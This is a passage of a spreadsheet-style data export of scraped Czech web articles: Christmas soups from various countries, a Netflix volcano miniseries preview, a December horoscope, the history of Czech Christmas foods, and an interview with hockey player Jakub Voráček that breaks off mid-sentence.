    <t>Vánoční polévky z různých koutů světa: Na sváteční stůl patří lokální ingredience Polský vánoční boršč Zdroj: iStock Zavřít Polský vánoční boršč Zdroj: iStock Vánoce jsou časem rodinných setkání, tradic a kulinářských lahůdek. V mnoha zemích je polévka neodmyslitelnou součástí svátečního menu. Různé kultury přinášejí své jedinečné recepty, které odrážejí místní suroviny, tradice a historii. Pojďme se podívat na několik zajímavých vánočních polévek z různých částí světa. 1. Česká republika : Rybí polévka V Česku je rybí polévka tradiční součástí štědrovečerní hostiny. Základem je vývar z rybí hlavy a kostí, nejčastěji kapra. Polévka se dochucuje kořenovou zeleninou, kořením a petrželkou a podává se také s rybími vnitřnostmi. Někdy se do ní přidává krupice nebo na másle osmažené kostičky rohlíku. Pro mnoho rodin je tato polévka symbolem Vánoc a její příprava je pečlivě předávána z generace na generaci. Připravte tradiční vánoční polévku z kapra podle návodného videoreceptu Kompletní recept najdete ZDE: Vánoční rybí polévka podle Zdeňka Pohlreicha 2. Polsko : Barszcz čili červený boršč V Polsku se na Štědrý večer podává červený boršč, známý jako barszcz wigilijny. Tento pokrm je připravován z červené řepy, která polévce dodává výraznou barvu a zemitou chuť. Podává se často s malými knedlíčky zvanými uszka, plněnými houbami nebo zelím. Boršč je v Polsku symbolem pohostinnosti a tradic. 9 3. Itálie : Minestra Maritata Na jihu Itálie , zejména v Neapoli , je populární minestra maritata, což v překladu znamená "svatební polévka". Tento název odkazuje na "svatbu" ingrediencí – zeleniny (jako špenát nebo kadeřávek) a masových kuliček, nejčastěji připravených z čerstvé salsiccie. Polévka je bohatá a vydatná, což z ní činí ideální pokrm pro chladné zimní večery. 10 4. Španělsko : Sopa de Galets Ve španělském Katalánsku je vánočním hitem sopa de galets. Tato polévka obsahuje velké těstoviny ve tvaru mušle, které jsou plněné mletým masem a podávají se v chutném vývaru z masa a zeleniny. Je to pokrm, který spojuje jednoduchost s elegancí a často se servíruje jako první chod vánočního oběda. Sopa de Galets Zdroj: iStock 5. Rusko : Soljanka V některých částech Ruska je vánoční specialitou soljanka, vydatná polévka kombinující různé druhy masa, okurky nakládané ve slaném nálevu, olivy a zakysanou smetanu. Je to polévka s bohatou, kyselou chutí, která zahřeje i v těch nejchladnějších zimních dnech. 5 6. Mexiko : Pozole V Mexiku je o Vánocích oblíbená polévka pozole, která má kořeny v předkolumbovských tradicích. Tento hustý vývar se připravuje z bílých kukuřičných zrn (hominy), masa (většinou vepřového nebo kuřecího) a dochucuje se červeným nebo zeleným chilli. Podává se s různými přílohami, jako jsou limetky, avokádo, ředkvičky, koriandr a křupavé tortilly. V Česku se jako vánoční polévka podává také krém z hrachu. Připravte ho podle návodného videoreceptu Kompletní recept najdete ZDE: Hrachová polévka – delikátní jemný krém s křupavou slaninou 7. Filipíny : Sotanghon Na Filipínách se během vánoční sezóny často servíruje sotanghon, polévka s tenkými skleněnými nudlemi, kuřecím masem a zeleninou. Dochucuje se česnekem a citronem a její lehkost a aromatičnost z ní činí oblíbený pokrm na slavnostní stůl. 8. Francie : Polévka z kaštanů Ve Francii je vánoční polévkou často krémová kaštanová polévka. Její jemná chuť a krémová konzistence pochází z kaštanů, másla a smetany. Někdy se dochucuje špetkou muškátového oříšku nebo trochou bílého vína , což dodává pokrmu sofistikovaný nádech. 9 9. Maďarsko : Halászlé V Maďarsku je tradiční vánoční polévkou halászlé, což je pikantní rybí polévka. Základem je kapr nebo jiné sladkovodní ryby a polévka se dochucuje výraznou maďarskou paprikou, která jí dodává jasně červenou barvu. Je to vydatné a chutné jídlo, které symbolizuje spojení s přírodou a tradicemi. 10 10. Finsko : Lososová polévka (Lohikeitto) Ve Finsku si lidé během Vánoc často pochutnávají na lososové polévce lohikeitto. Tento jemný pokrm se připravuje z lososa, brambor, cibule a smetany. Dochucuje se koprem, který polévce dodává čerstvou a aromatickou chuť. Je to jednoduchý, ale výživný pokrm, který oslavuje severské suroviny. 8 Vánoce na talíři Každá země má své unikátní chutě a tradice, které se odrážejí i ve vánočních polévkách. Ať už je to rybí polévka v Česku, exotické pozole v Mexiku , nebo luxusní kaštanová polévka ve Francii , všechny tyto recepty mají jedno společné: spojují rodiny u jednoho stolu a zahřívají tělo i duši. Co kdybychom letos zkusili do svého vánočního menu zařadit polévku z jiné země a obohatit tak naše sváteční chvíle o nové chutě? Zdroj: delish.com, foodandwine.com šéfredaktorka FTV Prima , Prima FRESH Nejlepší recepty e-mailem Zanechte nám svůj e-mail a 1x týdně vás upozorníme na to nejnovější a nejlepší z našeho webu. Štítky tradice Vánoce polévka Česko rybí polévka vývar pokrm ingredience Návrhy pro vás Autor: FTV Prima</t>
  </si>
  <si>
    <t>100360</t>
  </si>
  <si>
    <t>20241201_215_3475467806_14a56e75e665ca8cc1d2.html</t>
  </si>
  <si>
    <t>14a56e75e665ca8cc1d2</t>
  </si>
  <si>
    <t>Výbuch sopky, ničivé tsunami. Netflix láká na strhující seriál plný přírodních katastrof</t>
  </si>
  <si>
    <t>Výbuch sopky, ničivé tsunami. Netflix láká na strhující seriál plný přírodních katastrof Zdroj: Netflix Norská rodina míří na idylické Kanárské ostrovy. Doufá, že zde jako desítky tisíc ostatních prožije úžasnou dovolenou. Ze začátku to vypadá přesně tak, jak si naplánovala, vše se ale změní poté, co mladá vědkyně odhalí blížící se katastrofu v podobě ničivé sopečné erupce. Z odpočinku se tak rychle stává boj o život. Projekt je unikátní již samotnou formou. Jedná se volnou inspiraci událostmi, které se na ostrově La Palma skutečně staly v roce 2021 . Samozřejmě ve značně divácky přívětivější formě. Severští tvůrci si vydobyli své postavení zatím hlavně surovými až brutálními kriminálkami. Vysokorozpočtový katastrofický žánr je i přes několik již vydaných snímků stále poměrně neprozkoumaným tématem, o to zajímavější bude sledování výsledného produktu. Ten ze zatím dostupných záběrů působí skutečně velkolepě . Čtěte také: Závody ve zpomaleném tempu. Netflix nedokázal zachytit legendu Ayrtona Senny V úvodu nedávno vydaného traileru můžeme vidět spokojené trávení vánočních svátků na ostrově. Včetně pár úsměvných situací, které zná z rodinné dovolené asi každý. Tón se dramatický změní společně s efektním záběrem na klepající se skleničku s vínem . Poté je již všem zúčastněným naprosto jasné, že je nečekají zrovna příjemné chvíle. Výbuch sopky nebude to jediné, s čím si musí naši hrdinové a každý obyvatel ostrova poradit. Většina sopečných explozí je spojena s dalšími přírodními projevy . Jako je například zemětřesení a z toho vycházející sesuvy půdy nebo tsunami . Ani v tomto případě tomu bohužel nebude jinak… Začíná tak pomyslný závod a to, jak se dostat co nejrychleji z ostrova. Každý způsob cesty je ale spojen s nebezpečím. Letadla ohrožují plyny vycházející z vulkánu, lodě by zase zničilo případné tsunami, které navíc dle hlášení hrozí ve své nejsilnější formě. Nevyplatí se tedy ztrácet ani minutu, protože nejsou zdaleka ohroženy pouze Kanárské ostrovy. Ve své plném rozsahu ohrozí výbuch, a všechny následné událostmi miliony lidí . Minisérie o pouhých 4 epizodách si minimálně dle traileru skutečně nezadá s nejdražší Hollywoodskou produkcí. Pokud bude seriál doopravdy úspěšný , můžeme pravděpodobně čekat další takto rozmáchlé projekty. V hlavních rolích se představí Anders Baasmo , Ingrid Berdal nebo Johannes Joner . Režisérem je Kasper Bartfoed . Ten není u Netflixu nováčkem. V minulých letech režíroval seriály Zdravotní sestra a Kaštánek . Premiéra je stanovena na 12. prosince 2024 . Jste katastrofickými filmy a seriály na všechna možná témata již přehlceni? Nebo vás netradičnější projekty vždy osloví? Podělte se s námi o váš názor v komentářích! Autor: Erik Frydrich Autor person Erik Frydrich</t>
  </si>
  <si>
    <t>9290</t>
  </si>
  <si>
    <t>20241201_216_3475383838_05d7699a32e5b42a7cd0.html</t>
  </si>
  <si>
    <t>05d7699a32e5b42a7cd0</t>
  </si>
  <si>
    <t>Horoskop na prosinec: Blíženci nesmí spěchat, Panny přepínat své síly</t>
  </si>
  <si>
    <t>Horoskop na prosinec: Blíženci nesmí spěchat, Panny přepínat své síly Launchmetrics / Spotlight Foto: Launchmetrics / Spotlight Olga Krumlovská / 1. 12. 2024 Prosinec začal velmi dramaticky, včera ho započalo drsné novoluní a situaci dále zdramatizuje úplněk 15. prosince, jenž může zvýšit riziko otravy, podpořit lži, podvody a krádeže. Na konci prosince nás čeká ještě jedno novoluní, a to 30. prosince. Ani toto novoluní nepřinese příliš optimismu. Přesto se v prosinci objeví i příjemné dny. Zejména Štědrý den bude letos výjimečně pohodový a provoněný přátelskou konstelací. Beran (21. 3. - 20. 4.) Vaši duši a mysl ovládne velké štěstí a radost. Dávejte si však pozor, abyste nevystříleli celý arzenál nápadů najednou! Stanete se miláčky bohů, rozletíte se do světa a překážky budete zdolávat s elegancí a obdivuhodnou mrštností. Vítr v plachtách vás občas možná požene i hlavou proti zdi, ale tentokrát by to mohlo vyjít. Rada: Neztrácejte svůj pověstný optimismus. Se zářivým úsměvem na tváři pokračujte dál a mířte stále výš – vaše odhodlání vás dovede k úspěchu. Mohlo by se vám líbit Nová mánie v Hollywoodu : zubní fazety. K vidění jsou žvýkačky i koně Co nám vtloukaly do hlav naše mámy, když se ještě podílely na naší dobré výchově? Že musíme mít čisté boty, upravené ruce a – to především – hezké zuby. Nótu o dokonalém chrupu si naštěstí bere k srdci stále více lidí a hezké zuby se staly mnohem obvyklejším úkazem než kdysi. Od dokonale vyčištěných zubů jsme už ale zamířili mnohem dál. Také si všímáte, že stále více lidí má úplně jiný úsměv než kdysi? elle.cz Býk (21. 4. - 21. 5.) Pokud se necháte unést svými požitky a ztratíte kontrolu, následné lekce by mohly být nepříjemné. V tomto období bude důležité zachovat opatrnost zejména v oblasti financí, nákupů a prodejů. Vyvarujte se soudních sporů nebo uzavírání hypotéky – doba tomu nepřeje. Nespoléhejte na zázraky ani na nekonečnou ochranu andělů strážných. Rada: Vaše energie může být omezená, proto s ní nakládejte rozumně. Vyvarujte se přemíry alkoholu a rozhodně se držte dál od drog. Šetřete síly a zůstaňte pevně nohama na zemi. Mohlo by se vám líbit Na samotě u lesa: Nejkrásnější místa, kde nezavadíte ani o lišku Objevte nejkouzelnější útočiště, kde se zastavil čas a světelný smog ustoupil hvězdám. Podívejte se do míst, ve které vás čeká jen klid, šum lesa a nebeská nádhera, ideální pro únik do samoty. Odměnou vám bude čarovná atmosféra a čas daleko od lidí. elle.cz Blíženci (22. 5. - 21. 6.) Díky silné intuici a pocitu podpory mocných duchů, jako je Jupiter, si budete dovolovat více než obvykle. Tento pocit sebedůvěry vás však může vést k tomu, že přehlédnete důležité věci, zejména v rodinných vztazích. Vaše toulavé boty a neklidná povaha by mohly způsobit napětí, protože na své blízké možná nebudete mít vůbec čas. Pozor také na zkreslené vnímání reality a nezapomínejte zpomalit své tempo. Rada: Držte svou toulavou duši pevně na uzdě! Pokud ji necháte příliš rozběhnout, může vás to stát více, než si myslíte. Udržte rovnováhu mezi touhou po dobrodružství a povinnostmi. Mohlo by se vám líbit ELLE gift guide: 101 dárků pro všechny ženy, které si zaslouží hýčkat Hledáte každý rok pro každou ženu ve vašem životě ten nejlepší dárek? Chcete hýčkat beauty královnu, módní gurmánku, uměleckou duši nebo vaši oblíbenou neteř z generace Z. Budiž vám rádcem ELLE dárkový průvodce! Osvojíte si umění darovat a ukážete ženám ve vašem okolí, jak moc si jich vážíte. Zaslouží(me) si to. elle.cz Rak (22. 6. - 22. 7.) Musíte se pevně držet svých plánů a nepodlehnout zlozvykům, neřestem ani bujné fantazii, která u vás často nezná hranice. Tento měsíc hrozí, že se vám život – a zejména disciplína – vymkne z rukou. Budete mít sklony utíkat od reality a unášet se do světa iluzí, což by mohlo mít vážné následky. Spoléhejte na podporu někoho racionálního, kdo vám pomůže udržet nohy na zemi. Rada: Dejte si pozor na alkohol , cigarety a nezdravé přejídání. Hlídejte svou duševní rovnováhu, abyste se nestali štvanou zvěří vlastních neklidných myšlenek. Zkuste najít klid a řád, který vás zharmonizuje. Mohlo by se vám líbit Mentální zdraví: 5 osvědčených cvičení, které zastaví hluk myšlenek O všem neustále přemýšlíte, vracíte se do minulých situací a pro ty budoucí máte rovnou několik scénářů. Poznáváte v tom přesně to, co se denně odehrává ve vaší hlavě? Vítejte v klubu overthinkerů. Lidí, kteří se neustále motají v zacyklených myšlenkách jako křeček v kolečku. Existuje ale možnost, jak z něj vystoupit. Zkuste některý (nebo rovnou všechny) z těchto osvědčených způsobů. elle.cz Lev (23. 7. - 22. 8.) Vaše sebevědomí zůstane neotřesitelné, ať už se kolem vás budou dít intriky nebo se objeví nepravdy. Budete mít tolik aktivit a plánů, že na lásku možná nezbude čas ani energie. Nejlepší by bylo rozvrhnout si své povinnosti tak, abyste do nich mohli zapojit i partnera. Pokud vyrážíte do společnosti, vezměte ho s sebou – nechoďte sami. Rada: Nenechte se strhnout k lhostejnosti. Ukažte svému partnerovi, že vám na něm záleží – třeba květinami, šampaňským nebo jiným milým gestem. I malé projevy zájmu mohou znamenat velký rozdíl! Mohlo by se vám líbit Respekt ano, věčná vášeň nikoliv. Na co máte ve vztahu nárok? Sympatický, vtipný, ale zároveň dominantní, rozhodný a rázný. A taky pohledný, sportovně založený a dobře finančně zaopatřený. Že jsou vaše očekávání drobátko z říše snů, asi tušíte. Ale... Kde je hranice mezi reálným a přehnaným očekáváním? A na co všechno máte ve vztahu vlastně nárok? elle.cz Panna (23. 8. - 22. 9.) Tento měsíc vám láska přinese nemalé starosti a možná i těžkou hlavu. Nemusíte se však obávat ztráty partnera nebo trvalých problémů – půjde jen o dočasnou krizi, jaké zažívá každý vztah. Pravděpodobně si za ni budete částečně moct sami. Důležité je nepřehánět to s prací a nechat něco i na ostatních. Rada: I přes potíže a vlastní prohřešky se dokážete vzchopit, posbírat své síly a všechny problémy úspěšně překonat. Nebojte se čelit situacím a řešit je s rozvahou. Mohlo by se vám líbit Síla a klid: Spravte si podzimní náladu povzbuzující jógovou sekvencí Podzimní únava je něco, co většina z nás dobře zná. S příchodem chladnějšího počasí, kratších dní a nedostatkem slunečního světla často cítíme, jak nám dochází energie. Nejraději bychom zalezli pod deku, vypnuli svět a odložili všechny povinnosti. Připravili jsme pro vás jógovou sekvenci, která bude právě v takových chvílích vaším nejlepším přítelem. elle.cz Váhy (23. 9. - 23. 10.) Tento měsíc si nebudete moci na nic stěžovat – čekají vás pracovní úspěchy na více frontách. Ve financích si však dejte pozor, hrozí, že někdo využije vaši nepozornost a pokusí se vás obelstít nebo přímo oškubat. S trochou opatrnosti a zdravé nedůvěry ale toto nebezpečí zvládnete! Rada: Pokud máte touhu dělat dobré skutky, zvlášť během Vánoc, nezapomínejte věnovat pozornost tomu, komu a jak své těžce vydělané peníze dáváte. Ujistěte se, že podporujete správnou věc! Mohlo by se vám líbit Ze světa celebrit: údajné zásnuby Dicapria &amp;amp; útěk slavných z USA Nikdo tomu nechce věřit, ale všichni v to tajně doufají – z Hollywoodu se šíří drby o zasnoubení Leonarda DiCapria. Že by zapřísáhlý předseda „Klubu 25“ konečně svolil k tomu, aby vedle něj nějaká žena zestárla? Optimismus ovšem nesdílejí někteří jeho kolegové, kteří raději balí kufry a opouštějí Spojené státy . Zemí zaslíbenou se pro mnohé stává Velká Británie , kde královská rodina znovu nachází cestu k běžnému životu a plánuje velkolepé Vánoce. Co dalšího se odehrálo ve světě celebrit? elle.cz Štír (24. 10. - 22. 11.) Tento měsíc není příliš vhodný pro změnu zaměstnání, mnohem lepší by bylo přibrat si něco navíc – melouch nebo brigádu. Každá koruna navíc se hodí, ale vyhněte se nejistým transakcím. Nepouštějte se do hazardu, nezahrávejte si, a především se vyhněte půjčkám na dárky nebo dokonce hypotékám. Rada: Pečlivě zvažujte všechna pro a proti. Nenechte se nachytat na hezké řeči a vyplatí se vám smlouvat – nebuďte příliš důvěřiví! Mohlo by se vám líbit Edge styling: Drobný detail, který dodává mladistvý vzhled a svěžest Baby hair neboli jemné pramínky vlasů rámující obličej byly donedávna nechtěným doplňkem. Pokud si zajdete do korejského salónu zeptají se vás, jestli chcete baby hair či ne. V mnoha kulturách jsou totiž tyto pramínky upravovány, dodávají účesu kreativní šmrnc a umí oživit i jednoduchý culík. Objevte tento stylingový trik, který se stane vaší tajnou zbraní při oslavách konce roku. elle.cz Střelec (23. 11. - 21. 12.) Toužíte po dobrodružství a nových zkušenostech? Raději se však uskromněte a počkejte na lepší příležitost, která brzy přijde. Mars vám přichystá zajímavé možnosti, a Slunce spolu s Merkurem ve vašem znamení naznačují, že budete mít na výběr z několika nabídek. Důležité je správně rozložit síly a neslibovat víc, než můžete splnit. Rada: Věnujte více pozornosti pracovní morálce, buďte včas v práci a v patřičném stavu. Držte se moudrého přísloví – všeho s mírou, zejména když jde o oslavy! Mohlo by se vám líbit 5 nejúčinnějších pilates cviků pro uvolnění ztuhlého krku Ztuhlá a bolavá oblast krku je častým problémem, který je obvykle způsobený sedavým životním stylem, stresem nebo špatným držením těla. Pilates trenérka Daniela Bacíková pro vás vybrala pět účinných cviků, které pomáhají zmírnit napětí v krku. elle.cz Kozoroh (22. 12. - 20. 1.) Tento měsíc bude pro vás celkem poklidný, ale není důvod usnout na vavřínech. Měli byste si zajistit všechno, co jste dosud získali, a pokračovat v pečlivém budování. V životě vám budou přicházet nové věci spíše pozvolna. Pro zrozence, kteří mají zájem o okultní záležitosti a ezoteriku, mohou být tyto dny příležitostí k hlubšímu poznání a duchovnímu růstu. Rada: Největší podporu najdete v rodině – budou vás provázet zázraky a přízeň vesmíru. Udržujte pozitivní přístup a nechte se vést tím, co vám přináší život. Mohlo by se vám líbit 5 jednoduchých rad, jak skloubit práci a rodinu Kdo chce budovat kariéru, nemůže mít děti. A naopak. Děti a práce se ale vzájemně nevylučují. Důležité je, aby si tyto dva klíčové životní směry ve vašem životě i ve vaší hlavě vzájemně nekonkurovaly, ale byly spolu ve vzájemné symbióze. Pomůžeme vám najít ten správný balanc, abyste nemusela litovat, že jste nezvolila jen jednu z obou cest. elle.cz Vodnář (21. 1. - 20. 2.) Měli byste zachovat chladnou hlavu při drobných nedostatcích svého vyvoleného. Nedělejte zbytečné potíže, nevyvolávejte hádky kvůli malichernostem a už vůbec nezkoušejte jednat z pozice síly – ať už majetkové, profesní nebo fyzické. Zkuste být více empatičtí. S touto taktikou půjdete dál a snadněji dosáhnete svých cílů. Rada: Nikam nespěchejte, naučte se procházet a vychutnávat svět kolem sebe. Nebojte se naslouchat. Mohlo by se vám líbit Udělá z vás četba lepšího člověka? Empatii naučí třeba Harry Potter Říká se, že čtenář prožije tisíc životů, než zemře. Literatura nás vybavuje nástroji, které nám umožní orientovat se ve složitých lidských emocích a překlenout mezery v porozumění. Slouží také jako katalyzátor empatie, která dělá svět o něco hezčím. Jak v nás tedy čtení probouzí empatii? elle.cz Ryby (21. 2. – 20. 3.) Měli byste více pracovat s duší a zaměřit se na to, jakým směrem své síly nasměrujete. Rozvrhněte si lépe práci a zvažte, kam vynaložíte svou energii. Vhodné by bylo dbát na zdravou životosprávu a omezit zlozvyky, jako je kouření a nadměrná konzumace alkoholu . Tento měsíc je ale také příhodný pro vylepšení svého image, a to dokonce i riskováním změn, jako jsou kosmetické operace. Rada: Obrňte se veselou myslí a humorem. S úsměvem půjde všechno snáz, každý vás bude milovat. A když se dostanete do úzkých, každý vám rád pomůže. Mohlo by se vám líbit Mouse haircut: Střih, který promění každou šedou myšku v zimní krásku Není krátký střih nic pro vás? Seznamte se s mouse haircut, elegantní a rafinovaný střih, který kombinuje střední nebo delší délku vlasů s plnou ofinou. Vlasy nejsou nijak přehnaně sestříhané, hodí se tedy i pro jemné vlasy. Inspirujte se nadčasovým střihem vlasů, které nosily ikonické krásky jako Jane Birkin , Catherine Deneuve a nebo Bridgitte Bardot. elle.cz Zdroj článku: Autorský článek</t>
  </si>
  <si>
    <t>13290</t>
  </si>
  <si>
    <t>10350</t>
  </si>
  <si>
    <t>20241201_217_3475395328_55f9aea8a10f51b95f39.html</t>
  </si>
  <si>
    <t>55f9aea8a10f51b95f39</t>
  </si>
  <si>
    <t>Tajemství vánoční tabule. Jaký příběh skrývá smažený kapr, rybí polévka či bramborový salát? Vánoční jídla nejsou jen chutné pokrmy, ale jsou také důležitou součástí českých tradic a symboliky. Jaký příběh skrývají vánočka, rybí polévka či bramborový salát? Objevte, jak tato jídla propojovala generace a stala se neodmyslitelnou součástí sváteční tabule. Vánočka Vánočka má své kořeny hluboko ve středověku. Už ve 13. století byla součástí štědrovečerní hostiny, i když tehdy neměla dnešní podobu ani chuť. Pekl se bílý chléb známý jako calta, houska nebo štědrovka, která nesměla na slavnostním stole chybět. Tento chléb měl nejen sytit, ale byl také symbolickým nositelem štěstí, hojnosti a naděje na bohatou úrodu v příštím roce – to vše díky procesu kynutí, jenž byl považován za posvátný. Zpočátku se calty pekly ve veřejných pekárnách, což bylo běžné pro všechny slavnostní pečivo. Až kolem 18. století se jejich příprava přesunula do domácích kuchyní, kde se z pečení vánoček stala nejen povinnost, ale také tradice nesoucí rodinné poselství. Každá domácnost pekla tolik vánoček, kolik měla členů, a k tomu ještě jednu zvláštní, velkou, která se dávala doprostřed svátečního stolu. První vánočku dostal vždy hospodář. Tento zvyk měl přivolat úspěch a dobrou úrodu v příštím roce. Právě hospodář měl privilegium rozkrájet velkou vánočku a rozdělit ji mezi rodinu – a dokonce i mezi domácí zvířata, aby se jim dařilo. Vánočka však nebyla pouze rodinným pokrmem. Pekla se také jako dar – mezi sousedy, přáteli, ale i mezi chudými a bohatými. Posíláním vánoček si lidé projevovali štědrost a upevňovali dobré vztahy. Tento akt měl připomínat „dar z nebes“, tedy narození Ježíše Krista . Recept na tradiční máslovou vánočku naleznete zde . A pokud byste chtěli vyzkoušet něco nového, můžete vsadit na slanou škvarkovo-brynzovou vánočku podle Pavla Berkyho . Blíží se Vánoce, období, kdy se spotřeba potravin zvyšuje a s ní i zájem o cenovou dostupnost vánočního stolu. Jaké potraviny budou letos drahé, jak se vyvíjejí ceny masa a jak ovlivňuje situaci přístup vlády? Na tyto otázky odpovídali agrární ekonom Tomáš Majer a místopředseda Sdružení drůbežářských podniků David Bednář v pořadu Co na to vaše peněženka. Houbový kuba je jedním z nejstarších tradičních českých pokrmů, jehož kořeny sahají až do pohanských dob. Staří Slované považovali houby za posvátnou surovinu, spojenou s přírodou a magií. Kuba , připravovaný z ječných krup a sušených hub, byl původně jídlem chudého lidu. V dobách hladomorů a válek poskytoval jednoduchý a výživný pokrm, který zasytí i zahřeje. Přestože houby byly oblíbené i mezi vyššími vrstvami, kuba zůstával nejčastěji součástí jídelníčku prostých lidí. Tradičně je jeho původ spojován s jižními Čechami , odkud se postupně rozšířil do celé země a stal se tradičním vánočním pokrmem. Podle tradice se totiž nesmí jíst na Štědrý den až do večera maso, aby lidé spatřili zlaté prasátko. Zkuste ho i vy! Rybí polévka I rybí polévka je neodmyslitelnou součástí Štědrého dne. Její historie sahá až do středověku, kdy byla oblíbeným postním jídlem. Ve středověkých kuchyních ji připravovali zejména z kapra, který byl v Čechách snadno dostupnou rybou. Její příprava byla skromná, což odpovídalo dobovému duchu půstu, ale přesto plná chuti díky kombinaci bylinek a zeleniny. V průběhu staletí se rybí polévka přenesla ze šlechtických hostin i do lidových domácností a stala se tradiční součástí vánočního menu. Její pevné místo na stolech je spojeno nejen s gastronomií, ale i s českou vánoční symbolikou, která propojuje rybu s křesťanskými tradicemi. Vyzkoušet můžete například tento recept . Chcete nasát pravou vánoční atmosféru? Vydejte se na adventní trhy – letos se jich po České republice konají desítky. Sepsali jsme pro vás velký seznam vánočních trhů, které můžete navštívit. Podívejte se na jejich otevírací dobu i program. Pokud máte i vy tip na zajímavý adventní trh ve vašem regionu, pošlete nám ho na e-mailovou adresu zpravy@iprima.cz. Kapr patří k tradičním symbolům českých Vánoc, avšak jeho cesta na štědrovečerní stůl byla překvapivě dlouhá. Ve středověku a raném novověku Vánoce provázelo množství chodů symbolizujících hojnost, které však často obsahovaly spíše prostá jídla jako zelnou polévku, houbového kubu, pučálku či vánočku. Ryba se objevovala na svátečním stole pouze symbolicky, například její tvar mělo pečivo. Až v 19. století se kapr obecný začal prosazovat v měšťanských domácnostech jako typické vánoční jídlo. Na venkově a mezi chudšími vrstvami se tento zvyk rozšířil až po První světové válce díky rostoucí dostupnosti kapra z velkochovů. Recepty na úpravu kapra se od dob Magdaleny Dobromily Rettigové příliš nezměnily. Smažený kapr v trojobalu, který dnes dominuje české štědrovečerní tabuli, si získal oblibu zejména po druhé světové válce, kdy smažená jídla odpovídala tehdejším kulinářským trendům. Recept na něj naleznete zde. Pokud si ale chcete Štědrý večer ozvláštnit, můžete vyzkoušet kapra na černém pivě podle Jana Punčocháře či kapra marinovaného v ryzlinku . Ke kaprovi patří bramborový salát. Každá rodina má svůj vlastní osvědčený recept, často považovaný za nepřekonatelný. Variabilita tohoto pokrmu odráží jeho historii – od skromných začátků, kdy se připravoval pouze z dostupných ingrediencí, až po současné bohaté verze. Bramborový salát se stal v českých domácnostech oblíbeným ve 20. letech minulého století a jeho recept poprvé zaznamenala Marie Janků - Sandtnerová v roce 1924. Tehdejší salát se obešel bez majonézy a spojoval brambory, kořenovou zeleninu, vývar, ocet a olej. Díky své jednoduchosti a nízkým nákladům si jej mohly dovolit i chudší rodiny. Dnes je bramborový salát rozmanitější. Základ tvoří brambory a vařená zelenina, často doplněné vejci, cibulí, kyselými okurkami, případně salámem, a vše je spojeno majonézou nebo její zdravější variantou, jogurtem. Výsledná chuť závisí na poměrech jednotlivých surovin a kvalitě použitých přísad. Každý kraj, rodina i kuchař má své vlastní tajemství přípravy, které dělá jejich salát jedinečným. Vyzkoušejte recept Zdeňka Pohlreicha či Karla Gotta . Sportovkyně Ester Ledecká opět válí, a tentokrát ne na lyžích nebo na snowboardu, ale v hudbě. Po otci Jankovi Ledeckém zdědila i pěvecký talent. S Markem Ztraceným natočila vánoční duet. Co na to řekl její otec? Ledecká to prozradila v rozhovoru pro Showtime. Sladká tečka Pokud vám po sváteční večeři zbyde místo na sladkou tečku, vyzkoušejte vánoční pomerančový krém podle Ivety Fabešové . A pokud toužíte po něčem, co skutečně navodí tu pravou vánoční atmosféru, ochutnejte domácí vaječný koňak . redaktorka FTV Prima , CNN Prima NEWS Autor: Michaela Bartošová Autor person Michaela Bartošová</t>
  </si>
  <si>
    <t>20241201_218_3475374734_e2f80e373d5ea3801d3b.html</t>
  </si>
  <si>
    <t>e2f80e373d5ea3801d3b</t>
  </si>
  <si>
    <t>Jakub Voráček moderoval v žabkách a trenkách. Stejně nás zabírají od pasu nahoru, říká</t>
  </si>
  <si>
    <t>Jakub Voráček moderoval v žabkách a trenkách. Stejně nás zabírají od pasu nahoru, říká Jakub Voráček v Show Jana Krause Jakub Voráček nemá rád přehnanou vážnost. Zdroj: FTV Prima / Show Jana Krause Jakub Voráček Zdroj: FTV Prima / Show Jana Krause Jakub Voráček v Show Jana Krause Zdroj: FTV Prima / Show Jana Krause Jakub Voráček překvapil svým vyjádřením o hokeji. Zdroj: FTV Prima / Show Jana Krause Jakub Voráček byl inspirací pro hokejového maskota. Zdroj: FTV Prima / Show Jana Krause Jakub Voráček a Jan Kraus Zdroj: FTV Prima / Show Jana Krause Jakub Voráček nemá rád přehnanou vážnost. Zdroj: FTV Prima / Show Jana Krause Jakub Voráček Zdroj: FTV Prima / Show Jana Krause Jakub Voráček v Show Jana Krause Zdroj: FTV Prima / Show Jana Krause Jakub Voráček překvapil svým vyjádřením o hokeji. Zdroj: FTV Prima / Show Jana Krause Jakub Voráček byl inspirací pro hokejového maskota. Zdroj: FTV Prima / Show Jana Krause Jakub Voráček a Jan Kraus Zdroj: FTV Prima / Show Jana Krause Profesionální hokejový hráč Jakub Voráček překvapil svými slovy o sportu, kterému se věnoval velkou část svého života. Na jakých projektech aktuálně pracuje a co prozradil o Jaromíru Jágrovi ? Jakub Voráček je legenda české hokejové historie skrývající se pod číslem 93. Profesionální hokejový útočník, který odehrál přes tisíc zápasů v severoamerické NHL , kde strávil více než 14 let, a poslední rok se věnoval převážně mentoringu ve svém mateřském klubu na Kladně , letos oznámil konec své aktivní hráčské kariéry. Nemám rád rozmazlené děti, prozradil Jakub Voráček v předvánočním povídání Zato nejspíš započal novou, když přijal nabídku komentovat televizní přenosy z mistrovství světa v hokeji. A velice se osvědčil. „Dělal jsem to s panem Zárubou a byli jsme tak diametrálně odlišní, že nám to prostě vyhovovalo,“ popisoval Jakub svoji zkušenost v pořadu Show Jana Krause . „Sedlo si to a dá se říct, že Robert mě nechal být sám sebou, což bylo důležité. On je hrozný profík a já jsem naprostý opak. Naklusal jsem tam deset minut před přenosem v žabkách a v saku. Měl jsem bolavou nohu, takže jsem musel nosit žabky. Prvních pár zápasů jsem měl dlouhé kalhoty, ale pak jsem si řekl – s prominutím – s*ru na to, je tady vedro a stejně nás zabírají od pasu nahoru. Tak jsem to vyřešil žabkami a trenkami, a nikomu to nevadilo,“ popsal vtipnou situaci Voráček. Mohlo by vás zajímat: Voráček ukončil kariéru. Na led už nemůžu, smířil jsem se s tím, říká v exkluzivním rozhovoru Když se hovor stočil k praktickému hokeji, pokusil se Jakub svému hostiteli popsat, jak uspět při vhazování neboli buly, s tím, že on sám při tom příliš zdárný nebýval, protože tato role náleží zpravidla centrům. „Já jsem byl křídlo, takže jsem tam šel a máchnul jsem hokejkou. Buď jsem to trefil, nebo ne, ale většinou se mi to nepovedlo. Když se to ale povedlo, byla z toho potom po zápase s klukama u piva v bazénu velká sláva. Když jsme vyhráli, dali jsme si to vychlazené české pivo … ježiš, to jsou krásné vzpomínky,“ rozplýval se hokejista při tom, jak se v myšlenkách vracel zpátky v čase. Chtěl bych si zkusit život Bruce Springsteena , smál se Jakub Voráček ve Varech Za úspěchem stojí píle Recept na úspěch je podle něj stále stejný. „Píle, práce, jako se vším,“ dodal Jakub s tím, že buly je neskutečně 